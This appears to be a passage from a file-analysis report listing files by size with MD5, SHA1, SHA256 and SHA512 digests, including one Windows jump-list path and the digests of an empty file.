  SHA512  8a629bd819b54c2cea8755195ae014eaec0915927dea97eec04e22e85e620a00f19c0f452257c33cbf9d7062b0527836523c0215c93d8b331167e352f6ed550b

Filesize 1KB
  MD5     ba41608cd67c9bf8b337abc17ae4480c
  SHA1    af533f0bdabd2eab139fbce5e2c7373d09ee4fd6
  SHA256  73962296e4ef8953a320a5f57d6fc7b71cf54dce116f544a3c84ee4831785dfa
  SHA512  43d98a46a2d44d6c71c295ccda7291ac41a74dfcaceed8fec1b452b4269a8d04f65dce198cef93360aa86d83e352736e670fbc26f61ed7f14ea82e42fc92da55

Filesize 1KB
  MD5     60dc3dbd10a48722afdd55fe09f67af2
  SHA1    a122d2b4b632b18b9ea8b274bc4aedbdab790131
  SHA256  ce9ca67b0e957654963ea821ef1aa9a764c0d9b7d7780495c16f1ad51b2dc8c2
  SHA512  0d75bf3500f016c90500d5cfc91d405aea04fd84d68e35eda31f0454a552644490948e940720a8e88e5434fd0606a0fbe679f01b5aede040de4fed149355d68e

Filesize 1KB
  MD5     5ed3330a0ab917f7e0ba1a5cb52ec6c8
  SHA1    4ee9279f4da9b1d9963363724b0f84cf57835b0d
  SHA256  aeec991e22d719bc9476cef134891f623de342ad9eb4aeb58fd34704d584e91f
  SHA512  c24ea75cdb8a65b60e1b2a12beefe3a83664d69ef56530fc5671182495937a47e6a15463a0612e735bfb874afbd959cf488e7ae1569be3e2d8eb7b3d408e7de4

Filesize 1KB
  MD5     a5516ea1e7f7322a9de9c0875985ea32
  SHA1    50da4bda33eb6cdc2eb5383934321b09c705b79e
  SHA256  63968a00ddbf79e9ec70625e67aabda3a6c49975208358eaf4129feb9f99edb4
  SHA512  fbe129aefa8c6eda9ed062a1a4f4a1f2d5ff217d360d12853e16b22e487b5b17eebb3a5af109d4bf8582b013f9b6a544d197e5c8405d4cdcbf1205a277065758

Filesize 1KB
  MD5     c9bf255f64fe84741570022bfea747d0
  SHA1    c04d0cf69b67a96cb2f06bf5fcfe66332aadc1ef
  SHA256  06aad821eec40eb6995a5c492072afb0d3eb3aaadd672764fb4528c1fae30b7b
  SHA512  1d24455eb93b5cc214faf32d79d9383c3fd0061223ac2ed56dccd7f816b9092297db7621b99744681cbb1364ce3d5ad0eeef003bb885a9b42ea8dae57d58a67f

Filesize 1KB
  MD5     3d0515282ed6c241fef83d401c5686a7
  SHA1    20a480f503b216b0c11d2382803b715d6ffd66fd
  SHA256  1195297633e4b2be0d58fded755a618caa65540cfc552b094ffcae55dd7107ac
  SHA512  460c5a5140037e30b95af5ce7046b559df8f66539d8095de77db512386404188e971b082cd72ab2413fe34d7485174dcbacfaed38fbd92e3053081965b11f526

Filesize 1KB
  MD5     ef368c22dd163ce42182b8330d42b07c
  SHA1    dd649e2c892aa531aa0d7331fc88e3fda0f37a13
  SHA256  5758585dfb581bbbb106a3d26291cedd0afffe701ccd6e5f5277d8c400ab0f73
  SHA512  06a124f3f8f09d732c854e3b60a4350577cd2feabac8ce27bf5a31cef18abce1208e6ddecf599bc9211ac6a39d17372ade9183c306d38d73ae1dd3e0bfa28269

Filesize 874B
  MD5     811178364f0dc9eddcdc5a5a3bc9d2ad
  SHA1    7560be122edfdeb926d574d5cd4ed5149dc529fa
  SHA256  fc9e76e66c409e423c716178402b086405d9d486009ddc6542f6190ba0531ce6
  SHA512  74d16e8c0dedba3aae04c492a7fa807b3268b6fa5674289f0ed17650eee22d83fa9c396689fd94d6cd951013edf6b3725b77ca2db72814dc7ec80c7830f99737

Filesize 16B
  MD5     6752a1d65b201c13b62ea44016eb221f
  SHA1    58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Filesize 12KB
  MD5     36e22a096710fb46ac0427fdf9d3deb1
  SHA1    78b2d91ae7ad9f41462a7c2acbfd27de5b4ec404
  SHA256  ab055aa98fe8c0f498007f23609fd78143032a0593b58fc01cc468b4190c85e9
  SHA512  1b52e4c55e626662ed7dfddafaeb713c2ff81c0eec1b0d5ce47e4a227e6029a5a09014c0d026c0110f1a9e5e32d33b2c31ee12d3c6a48b17fa19c58b88020e50

Filesize 11KB
  MD5     eee21816e2f0697459d45806309af755
  SHA1    183438758fad31dd25a8d0f191ff889fbdacfd94
  SHA256  7caf2b7ec61176b9e71f7f503ef0280a8fd3445c70c6dd55f2cd70b8aa2a2ce7
  SHA512  75116a32e92aaf314b6a61edb79f96527125032949a1a7f46d38f0f0531ec90b4a671f3348ba7af0451d08eb7b4b42dfa7a6377c796d66d24f0b5f3dfe1bed6c

Filesize 12KB
  MD5     be4dc1c2b5064ceee0f69690cc914273
  SHA1    58eb19a860fd67b43ffd130910d291b719278f8e
  SHA256  0390984169d88e07958cde5ea6a06ea19c672968056cda518940059f28da6489
  SHA512  772164fd81b755b3503ba8719ff9b9491d144fd2cc8a027c22e531c8886c8fd3afe03d6364384466e2c6c3b71b106d6164c171f0deac7face4ff5e82c9f89368

Filesize 12KB
  MD5     548c29ddc46e5df7ec3a66faa41539ef
  SHA1    d51f328e2502c3eff5ffe0deb5bd51c7c3bac5a5
  SHA256  3ead548381e7cb3a9475b597f86048cdb85a337e9a1697739fc53de368a4bf21
  SHA512  6f85126eb7540e5e9b679ed0dd46433e85aeae5e117a1c1df818306e125df90e0c284173cf64315387cd23f18158927284ba9ef54eadb677f29a44375e8efbe2

Filesize 12KB
  MD5     4b6f7017a37e4279f90de494cb3c7ffc
  SHA1    8f9967b56162902e42127f4a65d83c38274b4ca6
  SHA256  a2c433bc75c108b0ffb574cfca821d473fe54713f4b697c0ce0c0f74b1f2c3ab
  SHA512  2d07ae95f160e2c2544d8315f20c923dd58dac7ad7cb6323778b78390d2fea5f09a7fbecdc8f570688e6d1406ce73dd0d6bd6698110bbe3363846069ead0850d

Filesize 56B
  MD5     f62904abb27a3574e2e6121349ab4955
  SHA1    35b3504f1d6bc88638a0721cf3d898eb0f95092a
  SHA256  d31225722321313554e736bcd9debc4cb4c5ed6dce3921fa7839162fede832b6
  SHA512  e8d1cf4c6a745790b2eaf4b3618703337313e3f561ba88982bc1a139aa4b5b29fd5f78f925e5bd12669eed74ca78510f6d6b1ce091bc55299057d2b2e867fb4e

Filesize 315KB
  MD5     b45c1b72aea0409ba684eb90d1e073a4
  SHA1    05627c3cc453a27b8250ef9a92392941445f674b
  SHA256  47c7599d077e92e10bc6385a75caa5072a4f9047b29a9eb8311054074342ebb0
  SHA512  03ebffec9fc19fdcee5fb62d28d99077d88d896e51cbb294b721ad5ad52787b47c3ad707f1ed36035e07bca72ac7cf78061fa2f0cecb537061da1e6b494cfe59

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize 8KB
  MD5     878a8a8cc1481c7d58045c3abe02bbd1
  SHA1    50a7a046b62c1c14ca44646c5e677f79f9f8786f
  SHA256  b7a3c988bb802f4a3ab1ce50f59b39f9b7adec47d567b99b69bc751d39a98721
  SHA512  eb1f6789d8634eae32d81d4c5d53716b4bcd1f024ce8fcccc2d1fab92b7253ab1b7e1e437c6ae15532be723a4a8857e1fa6598883df8048f4db7e9fc9cbac182

Filesize 124B
  MD5     54ba0db9b8701f99a46ae533da6fe630
  SHA1    2bd5aea2aceea62deb7ba06969ff6108f3381929
  SHA256  bb1455630e747e00b60910f9eadf47641ecc46e917034d08530430569d8eaeac
  SHA512  27fa4e43cf1a1b79a597cfb28aa29457aa096d8c485f84d7b2754268148bfa7430e53abdee4897f911af51aabbae3942ff57cbae02765bbea27e1c181bfecc1a

Filesize 84KB
  MD5     b6e148ee1a2a3b460dd2a0adbf1dd39c
  SHA1    ec0efbe8fd2fa5300164e9e4eded0d40da549c60
  SHA256  dc31e710277eac1b125de6f4626765a2684d992147691a33964e368e5f269cba
  SHA512  4b8c62ddfc7cd3e5ce1f8b5a1ba4a611ab1bfccf81d80cf2cfc831cffa1d7a4b6da0494616a53b419168bc3a324b57382d4a6186af083de6fc93d144c4503741

Filesize 18KB
  MD5     e7af185503236e623705368a443a17d9
  SHA1    863084d6e7f3ed1ba6cc43f0746445b9ad218474
  SHA256  da3f40b66cc657ea33dbf547eb05d8d4fb5fb5cf753689d0222039a3292c937a
  SHA512  8db51d9029dfb0a1a112899ca1f1dacfd37ae9dec4d07594900c5725bc0f60212ab69395f560b30b20f6e1dffba84d585ef5ae2b43f77c3d5373fe481a8b8fc3

Filesize 7B
  MD5     4047530ecbc0170039e76fe1657bdb01
  SHA1    32db7d5e662ebccdd1d71de285f907e3a1c68ac5
  SHA256  82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750
  SHA512  8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Filesize 315KB
  MD5     9f8bc96c96d43ecb69f883388d228754
  SHA1    61ed25a706afa2f6684bb4d64f69c5fb29d20953
  SHA256  7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
  SHA512  550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

Filesize 111KB
  MD5     e8ed8aaf35e6059ba28504c19ff50bab
  SHA1    01412235baf64c5b928252639369eea4e2ba5192
  SHA256  2d2a22db20a44474afbd7b0e6488690bad584dcae9789a5db776cc1a00b98728
  SHA512  d007c96b2fad26763d27be8447ca65e0ab890deb6388b90cf83c0b3431e09b225f7424098927b54f15fe34eae953b61b45371b0df4b2d89c60be9c006ffe9034

Filesize not recorded (these are the digests of a zero-length file, so it carries no content worth hunting for)
  MD5     d41d8cd98f00b204e9800998ecf8427e
  SHA1    da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e